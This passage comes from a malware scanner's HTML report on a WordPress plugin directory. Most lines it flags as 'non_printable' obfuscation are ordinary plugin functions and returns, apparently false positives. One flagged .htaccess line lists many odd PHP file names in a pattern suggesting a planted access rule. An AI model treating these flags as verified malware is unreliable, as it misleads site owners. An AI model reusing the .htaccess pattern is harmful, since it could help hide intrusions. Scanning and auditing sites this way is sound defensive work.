</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 142</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 145</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_tracking_enabled</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_white_label_enabled</span><span style="color: #007700">( </span><span style="color: #0000BB">$source </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$is_enabled</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">option_notice</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">handle_optin_optout</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">optin</span><span style="color: #007700">( </span><span style="color: #0000BB">$source </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">optout</span><span style="color: #007700">( </span><span style="color: #0000BB">$source </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 331</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">includes</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_usage_tracking_setting</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 381</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sanitize_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$input </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'no'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'yes'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 396</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_settings_field_html</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $time analytics installed time</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 424</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_analytics_install_time</span><span style="color: #007700">( </span><span style="color: #0000BB">$source </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 433</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">( </span><span style="color: #0000BB">$args</span><span style="color: #007700">, </span><span style="color: #0000BB">$analytics_path</span><span style="color: #007700">, </span><span style="color: #0000BB">$analytics_version </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 444</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">update_analytics_option_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$old_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">, </span><span style="color: #0000BB">$option </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 457</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_analytics_option_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$option</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 468</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">maybe_track_analytics</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_option_to_network</span><span style="color: #007700">( </span><span style="color: #0000BB">$option</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_actions</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 84</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">String URL of bsf</span><span style="color: #007700">-</span><span style="color: #0000BB">analytics directory</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_analytics_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$analytics_path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">( </span><span style="color: #0000BB">WP_CONTENT_DIR</span><span style="color: #007700">, </span><span style="color: #0000BB">content_url</span><span style="color: #007700">(), </span><span style="color: #0000BB">$analytics_path </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 94</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string API URL</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 97</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_api_url</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 98</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">defined</span><span style="color: #007700">( </span><span style="color: #DD0000">'BSF_API_URL' </span><span style="color: #007700">) ? </span><span style="color: #0000BB">BSF_API_URL </span><span style="color: #007700">: </span><span style="color: #DD0000">'https://support.brainstormforce.com/'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_502").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/smooth-scroll-setting.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.16 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_503" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">$switch </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(</span><span style="color: #0000BB">this</span><span style="color: #007700">); </span><span style="color: #0000BB">setTimeout</span><span style="color: #007700">(function(){ if(</span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">is</span><span style="color: #007700">(</span><span style="color: #DD0000">':checked'</span><span style="color: #007700">)) </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">false</span><span style="color: #007700">); else </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.onoffswitch-checkbox'</span><span style="color: #007700">).</span><span style="color: #0000BB">attr</span><span style="color: #007700">(</span><span style="color: #DD0000">'checked'</span><span style="color: #007700">,</span><span style="color: #0000BB">true</span><span style="color: #007700">); </span><span style="color: #0000BB">$switch</span><span style="color: #007700">.</span><span style="color: #0000BB">trigger</span><span style="color: #007700">(</span><span style="color: #DD0000">'onUltima</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 136</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">result</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_503").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/.htaccess</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_504" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">comdofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">connects</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">copypaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">delpaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">doiconvs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">epinyins</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">filefuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">gdftps</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hplfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">memberfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">moddofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">onclickfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">phpzipincs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qfunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">schallfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">tempfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">userfu</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_504").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.66 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 65</span><br><table id="file_505" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">; } if ( </span><span style="color: #0000BB">is_admin</span><span style="color: #007700">() ) { </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #DD0000">'clean_url'</span><span style="color: #007700">, </span><span style="color: #DD0000">'UAVC_product_license_redirect_to_modal_popup'</span><span style="color: #007700">, </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">3 </span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1002</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_bsf_core_frosty_hooks</span><span style="color: #007700">( </span><span style="color: #0000BB">$hooks </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1021</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">UAVC_product_license_redirect_to_modal_popup</span><span style="color: #007700">( </span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$original_url</span><span style="color: #007700">, </span><span style="color: #0000BB">$_context </span><span style="color: #007700">) { </span><span style="color: #FF8000">// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bsf_registration_page_url</span><span style="color: #007700">( </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #DD0000">'6892199' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1026</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Admin Area</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to get options</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Animation module</span><span style="color: #007700">.</span>
</span>
